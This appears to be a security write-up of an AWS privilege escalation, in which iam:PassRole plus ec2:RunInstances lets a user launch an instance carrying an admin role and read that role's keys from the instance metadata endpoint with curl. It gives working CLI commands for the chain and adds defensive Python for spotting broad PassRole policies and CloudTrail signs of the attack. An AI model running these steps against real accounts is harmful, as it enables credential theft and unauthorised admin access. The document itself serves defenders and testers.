Description

The iam:PassRole permission allows a user to pass a role to another AWS resource.

The ec2:RunInstances permission allows a user to run EC2 instances. With these two permissions, the user can create a new EC2 instance which they have SSH access to, pass a role to the instance with permissions that the user does not have currently, log into the instance, and request AWS keys for the role.

Requirements

The user needs to be able to pass a role to the instance with permissions that the user does not currently have.

The role needs to allow ec2.amazonaws.com to assume it.

The user needs to have some way to SSH into the newly created instance. In the example below, the user assigns an SSH key pair stored in AWS to the instance, and the user has access to the matching private key.



Example

In this example, the user is part of a single group. The group has only a single policy applied to it. The policy provides the user with the iam:PassRole permission, as well as the ability to list and run instances:

{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "VisualEditor0",
      "Effect": "Allow",
      "Action": [
        "iam:PassRole",
        "ec2:DescribeInstances",
        "ec2:RunInstances"
      ],
      "Resource": "*"
    }
  ]
}
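The statement above is what makes the chain possible: iam:PassRole on Resource "*" with no condition lets the user hand any role in the account to EC2. The following added example (not part of the original write-up) is a small policy check that flags that pattern, run against the policy from the text and against an assumed hardened version that scopes PassRole to one role and to the EC2 service; the account id and role name in the hardened policy are placeholders.

```python
# Added example (not from the write-up): flag IAM policy statements that grant
# iam:PassRole on every role or without an iam:PassedToService condition.
# WEAK_POLICY is the policy from the text; HARDENED_POLICY is an assumed fix.
import fnmatch
import json

WEAK_POLICY = json.loads("""{
  "Version": "2012-10-17",
  "Statement": [{"Sid": "VisualEditor0", "Effect": "Allow",
    "Action": ["iam:PassRole", "ec2:DescribeInstances", "ec2:RunInstances"],
    "Resource": "*"}]
}""")

# Assumed hardened form: PassRole only for one named role, and only to EC2.
HARDENED_POLICY = json.loads("""{
  "Version": "2012-10-17",
  "Statement": [
    {"Effect": "Allow",
     "Action": ["ec2:DescribeInstances", "ec2:RunInstances"],
     "Resource": "*"},
    {"Effect": "Allow",
     "Action": "iam:PassRole",
     "Resource": "arn:aws:iam::123456789012:role/ec2-app-role",
     "Condition": {"StringEquals": {"iam:PassedToService": "ec2.amazonaws.com"}}}
  ]
}""")

def _as_list(value):
    return value if isinstance(value, list) else [value]

def _grants_passrole(action):
    # IAM action matching is case-insensitive and supports '*' wildcards,
    # so "iam:Pass*", "iam:*" and "*" all cover PassRole.
    return fnmatch.fnmatchcase("iam:passrole", action.lower())

def find_broad_passrole(policy):
    """Return (statement index, issue) for each over-broad PassRole grant."""
    findings = []
    for idx, stmt in enumerate(policy.get("Statement", [])):
        if stmt.get("Effect") != "Allow":
            continue
        if not any(_grants_passrole(a) for a in _as_list(stmt.get("Action", []))):
            continue
        resources = _as_list(stmt.get("Resource", []))
        if any(r == "*" or r.endswith("role/*") for r in resources):
            findings.append((idx, "PassRole allowed on any role"))
        if "iam:passedtoservice" not in json.dumps(stmt.get("Condition", {})).lower():
            findings.append((idx, "no iam:PassedToService condition"))
    return findings
```

The check is deliberately simple: it does not evaluate Deny statements or NotAction, so treat a clean result as a starting point rather than proof that PassRole is properly scoped.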



The user is not currently able to add their user account to the Admin group:

→ aws iam add-user-to-group --group-name Admin --user-name privesc_test --profile privesc

An error occurred (AccessDenied) when calling the AddUserToGroup operation: User: arn:aws:iam::[REDACTED]:user/privesc_test is not authorized to perform: iam:AddUserToGroup on resource: group Admin



First, the user creates a new instance using the following command:

→ aws ec2 run-instances --image-id ami-0de53d8956e8dcf80 --instance-type t2.micro --iam-instance-profile Name=adminaccess --key-name "Public" --security-group-ids sg-ca4a1fb8 --profile privesc --region us-east-1





This command includes the following switches:

- image-id specifies the Amazon Machine Image (AMI) to use. The image-id used here is for an Amazon Linux VM. AWS regularly changes their AMIs, so make sure to use a current value for the image-id.

- instance-type specifies the type of instance to create. In this case, it's a free-tier eligible instance.

- iam-instance-profile is the role to assign to the EC2 instance. This refers to an IAM role by name, in this case, adminaccess. This role provides administrative access to AWS.

- key-name refers to a stored SSH key pair by name.

- security-group-ids specifies one or more security groups that will apply to the instance. The security group applied in this example provides only SSH access.

- region refers to the region where the instance should be created.



The result of this command is very long and not shown here to save space. The output provides information on the instance that was just created, and most importantly, the instance ID. The newly created instance will be in the “pending” state for a couple of minutes until provisioning is complete. The user can request information about the instance with the following command, replacing instance-id with the appropriate instance ID:

→ aws ec2 describe-instances --instance-id i-03aba12967c0cb73a --profile privesc --region us-east-1



Again, the output will be very long and not shown here. However, once provisioning is complete, the “state” of the instance will change to “running” and it should obtain a public IP address. At this point, the attacker can SSH into the instance, provided that they have the private SSH key that belongs to the “Public” key pair. After gaining access to the instance, the user can then request AWS keys for the adminaccess role through the metadata IP address:

→ ssh ec2-user@3.84.235.112 -i ~/.ssh/id_rsa

Warning: Permanently added '3.84.235.112' (RSA) to the list of known hosts.
X11 forwarding request failed on channel 0

       __|  __|_  )
       _|  (     /   Amazon Linux 2 AMI
      ___|\___|___|

https://aws.amazon.com/amazon-linux-2/

[ec2-user@ip-172-31-57-71 ~]$ curl http://169.254.169.254/latest/meta-data/iam/security-credentials/adminaccess
{
  "Code" : "Success",
  "LastUpdated" : "2019-03-15T22:47:58Z",
  "Type" : "AWS-HMAC",
  "AccessKeyId" : "[REDACTED]",
  "SecretAccessKey" : "[REDACTED]",
  "Token" : "[REDACTED]",
  "Expiration" : "2019-03-16T05:22:37Z"
}



The user can now use the AWS keys and the associated session token to make AWS API calls under the adminaccess role. The commands below show the user adding themselves to the Admin group and then confirming the new membership:

→ aws iam add-user-to-group --group-name Admin --user-name privesc_test --profile stolen-keys

→ aws iam list-groups-for-user --user-name privesc_test --profile privesc
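From the detection side, every step of this chain leaves a CloudTrail record, and the credentials pulled from the instance metadata service show up as an assumed-role session whose role session name is the instance ID. The added example below (not part of the original write-up) correlates a RunInstances call that passed an instance profile with later IAM/STS calls made by that instance's session; the records are constructed to mirror the steps above, and the account id 123456789012 is a placeholder.

```python
# Added example (not from the write-up): correlate CloudTrail records to spot
# PassRole-to-EC2 escalation. EVENTS are constructed to mirror the write-up's
# steps; account id 123456789012 is a placeholder. Instance-profile credentials
# appear in CloudTrail as assumed-role/<role>/<instance id>.
import json

EVENTS = [json.loads(s) for s in (
    '{"eventTime":"2019-03-15T22:40:00Z","eventSource":"ec2.amazonaws.com","eventName":"RunInstances",'
    '"userIdentity":{"type":"IAMUser","userName":"privesc_test"},'
    '"requestParameters":{"iamInstanceProfile":{"name":"adminaccess"}},'
    '"responseElements":{"instancesSet":{"items":[{"instanceId":"i-03aba12967c0cb73a"}]}}}',
    '{"eventTime":"2019-03-15T22:50:00Z","eventSource":"iam.amazonaws.com","eventName":"AddUserToGroup",'
    '"userIdentity":{"type":"AssumedRole",'
    '"arn":"arn:aws:sts::123456789012:assumed-role/adminaccess/i-03aba12967c0cb73a",'
    '"sessionContext":{"sessionIssuer":{"userName":"adminaccess"}}},'
    '"requestParameters":{"groupName":"Admin","userName":"privesc_test"}}',
    '{"eventTime":"2019-03-15T22:51:00Z","eventSource":"ec2.amazonaws.com","eventName":"DescribeInstances",'
    '"userIdentity":{"type":"IAMUser","userName":"privesc_test"}}',
)]

# Calls to these services from an instance-profile session deserve a look.
WATCHED_SOURCES = {"iam.amazonaws.com", "sts.amazonaws.com"}

def correlate(events):
    """Return (launching user, passed role, instance id, later call) tuples."""
    launched = {}  # instance id -> (user who called RunInstances, passed role)
    for ev in events:
        if ev.get("eventName") != "RunInstances":
            continue
        role = ev.get("requestParameters", {}).get("iamInstanceProfile", {}).get("name")
        user = ev.get("userIdentity", {}).get("userName")
        items = ev.get("responseElements", {}).get("instancesSet", {}).get("items", [])
        for item in items:
            if role:
                launched[item["instanceId"]] = (user, role)
    alerts = []
    for ev in events:
        ident = ev.get("userIdentity", {})
        if ident.get("type") != "AssumedRole" or ev.get("eventSource") not in WATCHED_SOURCES:
            continue
        session = ident.get("arn", "").rsplit("/", 1)[-1]  # role session name
        if session in launched:
            user, role = launched[session]
            alerts.append((user, role, session, ev["eventName"]))
    return alerts

if __name__ == "__main__":
    for user, role, instance, call in correlate(EVENTS):
        print("%s launched %s with role %s; that session then called %s" % (user, instance, role, call))
```

In practice, feed correlate() with events from a CloudTrail lookup or a log archive and tune WATCHED_SOURCES to the services an instance profile in your environment should never touch.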